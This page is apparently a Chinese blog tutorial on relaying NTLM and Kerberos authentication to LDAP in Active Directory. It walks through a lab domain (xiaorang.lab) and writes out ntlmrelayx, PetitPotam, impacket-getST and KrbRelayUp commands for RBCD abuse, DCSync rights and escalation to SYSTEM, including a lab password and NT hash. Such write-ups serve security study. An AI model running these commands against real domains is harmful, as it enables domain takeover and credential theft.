当前位置: 首页 > news >正文

【内网渗透】Relay2LDAP之NTLMKerberos两种利用

news 2025/8/24 14:39:49

目录

通用思路

ntlmrealy

kerberos relay

聊聊中继攻击的利用,Relay2LDAP

前提:目标机器未开ldap签名

签名扫描工具:

https://github.com/zyn3rgy/LdapRelayScan

通用思路

  1. 高权限用户滥用

    • 前提条件:NTLM身份验证的发起用户是以下高权限组的成员:

      • Enterprise Admins

      • Domain Admins

      • Built-in Administrators

      • Backup Operators

      • Account Operators

    • 攻击手法:利用其高权限,可以将任意用户添加到这些管理员组中,从而直接提升该用户为域管理员等高权限身份。

  2. Write-ACL权限滥用 (DCSync攻击向量)

    • 前提条件:NTLM发起者对域对象的两个关键复制权限(ACE)拥有Write-ACL权限:

      • DS-Replication-Get-Changes (GUID: 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2)

      • DS-Replication-Get-Changes-All (GUID: 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2)

    • 攻击手法:利用Write-ACL权限,在上述权限的访问控制列表(ACL)中添加一个任意用户,从而使该用户获得DCSync权限,能够导出域内所有用户的哈希值。

    • 典型案例Exchange Windows Permissions组通常就具备此类权限。

  3. 基于资源的约束委派 (Resource Based Constrained Delegation, RBCD)

    • 适用环境:Server 2012 R2之后,且攻击者不具备上述高权限时。

    • 前提条件:能够控制一个具有SPN的账户(如机器账户或服务用户)。

    • 攻击手法:修改NTLM发起者计算机对象的msDS-AllowedToActOnBehalfOfOtherIdentity属性,添加一条访问控制项(ACE),授予被控制的账户对该计算机的委派权限。从而可以 impersonate 任何用户来访问该计算机。

ntlmrealy

使用impacket里的ntlmrelayx

以打RBCD为例

  • 172.22.11.76 已经拿下
  • 172.22.11.45 XR-DESKTOP.xiaorang.lab MS17-010
  • 172.22.11.26 XIAORANG\XR-LCM3AE8B
  • 172.22.11.6 XIAORANG\XIAORANG-DC

开启ntlmrelayx,利用已被控制的XR-Desktop作为恶意机器账户设置RBCD,接着使用Petitpotam触发XR-LCM3AE8B认证到172.22.11.76(攻击者IP)

proxychains4 impacket-ntlmrelayx -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
proxychains python PetitPotam.py -u yangmei -p xrihGHgoNZQ -d xiaorang.lab ubuntu@80/webdav 172.22.11.26

用机器账户XR-DESKTOP$哈希打172.22.11.26的RBCD,申请ST票据

proxychains4 impacket-getST -spn cifs/XR-LCM3AE8B.xiaorang.lab -impersonate administrator -hashes :1feeaf9a8e1e24a26e80c401c990b325  xiaorang.lab/XR-Desktop\$ -dc-ip 172.22.11.6
export KRB5CCNAME=administrator.ccache

kerberos relay

使用krbrelayup

https://github.com/expl0itabl3/Toolies

KrbRelayUp.exe relay --domain lab.com --CreateNewComputerAccount --ComputerName hack$  --ComputerPassword Aa123456!!
KrbRelayUp.exe spawn -m rbcd -d lab.com -dc 192.168.233.140 -cn hack$ -cp Aa123456!!

本质上还是打的RBCD

从一个可RDP的普通域用户提权到SYSTEM机器用户

http://www.dtcms.com/a/347826.html

相关文章:

  • windows中bat脚本的一些操作(三)
  • 如和在不同目录之间引用模块-python
  • 微调系列:LoRA原理
  • MVC模式在个人博客系统中的应用
  • 【通俗易懂】TypeScript 增加了 JavaScript 的可选链 (?.) 和空值合并运算符 (??)理解
  • 【集合和映射】USACO Bronze 2019 December - 我在哪Where Am I?
  • 机器学习案例——预测矿物类型(模型训练)
  • DS18B20温度传感器详解
  • 电阻的功率
  • 多光谱相机检测石油石化行业的跑冒滴漏的可行性分析
  • 电蚊拍的原理及电压电容参数深度解析:从高频振荡到倍压整流的完整技术剖析
  • 决策树基础学习教育第二课:量化最优分裂——信息熵与基尼系数
  • 01_Python的in运算符判断列表等是否包含特定元素
  • [Vid-LLM] 创建和训练Vid-LLMs的各种方法体系
  • crypto.randomUUID is not a function
  • 一个备份、去除、新增k8s的node标签脚本
  • Redis(八股二弹)
  • 玳瑁的嵌入式日记D24-0823(数据结构)
  • 每日一题8.23
  • Day26 树的层序遍历 哈希表 排序算法 内核链表
  • 线程池理解
  • CMake安装教程
  • 传统 AI 与生成式 AI:IT 领导者指南
  • 10.Shell脚本修炼手册---脚本的条件测试与比较
  • 如何查看MySQL 的执行计划?
  • 引领GEO优化服务新潮流 赋能企业数字化转型
  • 信贷模型域——信贷获客模型(获客模型)
  • AI大模型 限时找我领取
  • Transformer核心概念I-token
  • Java:对象的浅拷贝与深拷贝